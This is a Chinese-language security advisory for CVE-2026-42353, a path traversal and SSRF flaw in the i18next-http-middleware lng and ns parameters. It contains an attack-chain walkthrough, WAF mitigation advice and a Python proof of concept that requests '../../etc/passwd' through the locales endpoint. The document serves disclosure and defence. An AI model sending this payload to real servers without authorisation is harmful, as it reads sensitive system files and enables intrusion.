CVE-2026-42353 i18next-http-middleware路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-42353

漏洞类型

路径遍历/SSRF

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

i18next-http-middleware

漏洞概述

i18next-http-middleware是用于Node.js和Deno的中间件。在3.9.3版本之前，该组件在处理资源请求时，未对用户提供的lng（语言）和ns（命名空间）参数进行过滤，直接将其传递给后端加载器。这允许攻击者根据后端配置的不同，实施路径遍历攻击读取敏感文件，或发起服务器端请求伪造（SSRF）攻击探测内网。该漏洞无需认证即可利用，风险较高。

技术细节

漏洞位于getResourcesHandler函数中，该函数接收HTTP请求中的lng和ns参数。由于缺少校验，攻击者可以注入包含路径遍历序列（如../）的字符串。当i18next.services.backendConnector.load函数使用这些参数拼接路径并调用文件系统或HTTP后端时，攻击者即可跳出预期目录访问任意文件（路径遍历），或诱导服务器向任意URL发起请求（SSRF）。攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需权限（PR:N）。

攻击链分析

STEP 1

侦察

识别目标是否使用了i18next-http-middleware中间件及相关资源接口。

STEP 2

构造载荷

攻击者构造包含路径遍历字符（如../）或内网地址的lng和ns参数。

STEP 3

发送请求

向目标服务器发送包含恶意参数的HTTP GET请求。

STEP 4

漏洞触发

服务器后端未经过滤直接处理参数，导致读取系统文件或向内网发起请求。

STEP 5

数据回传

攻击者接收服务器响应，获取敏感文件内容或内网服务信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_poc(url):
    # Targeting the endpoint handled by i18next-http-middleware
    # Exploiting the 'lng' parameter for path traversal
    target = f"{url}/locales"
    params = {
        "lng": "../../etc/passwd",  # Payload to escape directory
        "ns": "en"
    }
    
    try:
        r = requests.get(target, params=params, timeout=5)
        if r.status_code == 200 and "root:" in r.text:
            print("[+] Vulnerability confirmed! Sensitive file read.")
            return True
        else:
            print("[-] Vulnerability not detected or payload failed.")
    except Exception as e:
        print(f"Error: {e}")
    return False

if __name__ == "__main__":
    check_poc("http://127.0.0.1:3000")

影响范围

i18next-http-middleware < 3.9.3

防御指南

临时缓解措施

若无法立即升级，建议在WAF层添加规则，拦截URL参数中包含“../”、“%2e%2e”等路径遍历特征的请求。同时，确保服务器以低权限用户运行，防止敏感文件泄露。